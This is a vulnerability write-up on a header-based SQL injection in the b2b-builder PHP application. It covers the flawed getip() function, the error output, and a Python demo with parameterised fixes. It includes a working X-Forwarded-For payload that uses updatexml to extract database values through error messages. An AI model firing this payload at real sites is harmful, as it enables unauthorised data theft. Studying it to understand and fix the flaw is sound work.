b2b-builder: multiple SQL injection vulnerabilities
Code analysis
A fairly classic X-Forwarded-For (XFF) SQL injection. b2bbuilder does run addslashes over request input, but the function that obtains the client IP reads the X-Forwarded-For and Client-IP headers straight from $_SERVER, and those header values never go through that escaping:
function getip()
{
    if (isset($_SERVER)) {
        // Request headers are attacker-controlled: the first one present wins
        // and its value is returned without any validation or escaping.
        if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
            $realip = $_SERVER['HTTP_X_FORWARDED_FOR'];
        } elseif (isset($_SERVER['HTTP_CLIENT_IP'])) {
            $realip = $_SERVER['HTTP_CLIENT_IP'];
        } else {
            $realip = $_SERVER['REMOTE_ADDR'];
        }
    } else {
        // Same precedence via getenv(), same lack of validation.
        if (getenv("HTTP_X_FORWARDED_FOR")) {
            $realip = getenv("HTTP_X_FORWARDED_FOR");
        } elseif (getenv("HTTP_CLIENT_IP")) {
            $realip = getenv("HTTP_CLIENT_IP");
        } else {
            $realip = getenv("REMOTE_ADDR");
        }
    }
    return $realip;
}
Many places call this function to obtain the IP and concatenate the result into SQL that is then executed, for example login.php and register.php. Other locations are affected for the same reason and were not tested one by one. Registration is used as the example.
$ip = getip();
$ip = empty($ip) ? NULL : $ip;   // raw header value, still unescaped
$nt = time();
$regtime = date("Y-m-d H:i:s");
$db = new dba($config['dbhost'], $config['dbuser'], $config['dbpass'], $config['dbname'], $config['dbport']);
$sql = "select * from ".ALLUSER." where user='$user' or email='$email'";
$db->query($sql);
if ($db->num_rows())
    die("User name is have");
//----------------
if (!empty($config['user_reg']) && $config['user_reg'] != 3)
    $user_reg = $config['user_reg'];
elseif ($config['user_reg'] == 3)
    $user_reg = 1;
else
    $user_reg = 2;
//----------------
// $ip is interpolated into the statement string: a single quote in the
// header closes the literal and the remainder is parsed as SQL.
$sql = "insert into ".ALLUSER."
    (user,password,ip,lastLoginTime,qq,msn,sex,mobile,position,email,country,regtime,statu,name)
    values
    ('$user','".md5($pass)."','$ip','$nt','$_POST[qq]','$_POST[msn]','$_POST[sex]','$_POST[mobile]','$_POST[pos]','$email','$country','$regtime','$user_reg','$_POST[realname]')";
$re = $db->query($sql);
This snippet starts at line 103. The value returned by getip() ends up, unescaped, in the ip column of the insert into ALLUSER shown above.
Test: send the header X-Forwarded-For: 1.1.1.1' (with a trailing single quote). The server returns:
insert into b2bbuilder_page_view
(url,ip,time,username,fileName)
values
('%2Fb2bbuilder%2Fregister.php','1.1.1.1'','2015-05-14 17:21:11','test','/b2bbuilder/register.php')
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2015-05-14 17:21:11','test','/b2bbuilder/register.php')' at line 4
Note that the statement that fails is the page-view logging insert into b2bbuilder_page_view, which runs before the registration insert and takes its ip value from the same getip() call. The injected quote appears in the query text verbatim, and the application prints the full statement together with the MySQL error, which makes error-based extraction straightforward.
Exploitation
PoC: X-Forwarded-For: 1.1.1.1' or updatexml(1,concat(0x5c,user()),1) or '
insert into b2bbuilder_page_view
(url,ip,time,username,fileName)
values
('%2Fb2bbuilder%2Fregister.php','1.1.1.1' or updatexml(1,concat(0x5c,user()),1) or '','2015-05-14 19:27:43','test','/b2bbuilder/register.php')
XPATH syntax error: '\root@localhost'
The trailing or ' re-opens a string literal, so the statement stays syntactically valid. updatexml() then rejects the concat(0x5c, ...) argument as invalid XPath and includes it in its error message, which the application echoes back, so the result of user() (or any other expression placed inside the concat) is read directly from the response.
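As an added example (not b2b-builder's code), the following Python script reproduces both halves of the problem described above in a form that runs offline, with the fix beside each: a copy of getip()'s trust-every-header logic next to a version that honours X-Forwarded-For only when the TCP peer is a configured proxy and only if the hop parses as an IP address, and the string-concatenated insert next to a parameterised one. SQLite stands in for MySQL, so the exfiltration payload uses sqlite_version() where the PoC above used updatexml(user()); the TRUSTED_PROXIES network, the table layout and the request dictionaries are assumptions constructed for the example.

```python
"""Added example, not b2b-builder code: why getip() is injectable and how to fix it.

Two defects are shown side by side:
  1. getip() believes X-Forwarded-For unconditionally, so the "client IP" is attacker text.
  2. that text is concatenated into SQL, so a single quote rewrites the statement.
"""
import ipaddress
import sqlite3

# Reverse proxies whose X-Forwarded-For we are willing to believe (assumed for the example).
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def getip_vulnerable(server: dict) -> str:
    """Mirror of b2bbuilder's getip(): first header present wins, no validation."""
    for key in ("HTTP_X_FORWARDED_FOR", "HTTP_CLIENT_IP", "REMOTE_ADDR"):
        if server.get(key):
            return server[key]
    return ""


def getip_hardened(server: dict) -> str:
    """Use the TCP peer address unless it is a trusted proxy. If it is, take the
    right-most X-Forwarded-For hop (the one that proxy appended) and require it
    to parse as an IP address; anything else falls back to REMOTE_ADDR."""
    try:
        remote_ip = ipaddress.ip_address(server.get("REMOTE_ADDR", ""))
    except ValueError:
        return ""
    if not any(remote_ip in net for net in TRUSTED_PROXIES):
        return str(remote_ip)
    hops = [h.strip() for h in server.get("HTTP_X_FORWARDED_FOR", "").split(",") if h.strip()]
    if not hops:
        return str(remote_ip)
    try:
        return str(ipaddress.ip_address(hops[-1]))
    except ValueError:
        return str(remote_ip)


def setup_db() -> sqlite3.Connection:
    """In-memory stand-in for b2bbuilder_page_view (constructed schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("create table page_view (url text, ip text, time text, username text)")
    return db


def log_view_concat(db: sqlite3.Connection, url: str, ip: str, time: str, user: str) -> None:
    """The b2bbuilder pattern: values interpolated into the SQL string."""
    sql = f"insert into page_view (url,ip,time,username) values ('{url}','{ip}','{time}','{user}')"
    db.execute(sql)


def log_view_param(db: sqlite3.Connection, url: str, ip: str, time: str, user: str) -> None:
    """The fix: bound parameters, so the value is data and never SQL."""
    db.execute("insert into page_view (url,ip,time,username) values (?,?,?,?)", (url, ip, time, user))


def run_demo() -> dict:
    """Exercise both insert styles with the header value from the writeup."""
    db = setup_db()
    results = {}
    # Constructed request: the peer is not a trusted proxy, yet it sends a forged XFF header.
    hostile = {"REMOTE_ADDR": "203.0.113.5", "HTTP_X_FORWARDED_FOR": "1.1.1.1'"}
    results["vuln_ip"] = getip_vulnerable(hostile)   # "1.1.1.1'"
    results["safe_ip"] = getip_hardened(hostile)     # "203.0.113.5"

    # 1) The bare quote breaks the statement, exactly as in the MySQL error above.
    try:
        log_view_concat(db, "/register.php", results["vuln_ip"], "2015-05-14 17:21:11", "test")
        results["concat_error"] = None
    except sqlite3.OperationalError as exc:
        results["concat_error"] = str(exc)

    # 2) A syntactically valid payload: the "ip" is now an SQL expression that
    #    evaluates inside the database (sqlite_version() stands in for user()).
    log_view_concat(db, "/register.php", "1.1.1.1'||sqlite_version()||'", "t", "test")
    results["concat_stored"] = db.execute("select ip from page_view").fetchone()[0]

    # 3) Same hostile value through a bound parameter is stored as inert text.
    db.execute("delete from page_view")
    log_view_param(db, "/register.php", results["vuln_ip"], "t", "test")
    results["param_stored"] = db.execute("select ip from page_view").fetchone()[0]
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value!r}")
```

Two design points: the hardened function takes the right-most hop rather than the left-most, because a proxy appends the address it actually saw to the end of the list while everything to the left arrived from the client and may be forged; and validating the IP is not the fix for the injection, parameter binding is, so the parameterised insert stays correct even if the application later stores a non-IP value in that column for some other reason.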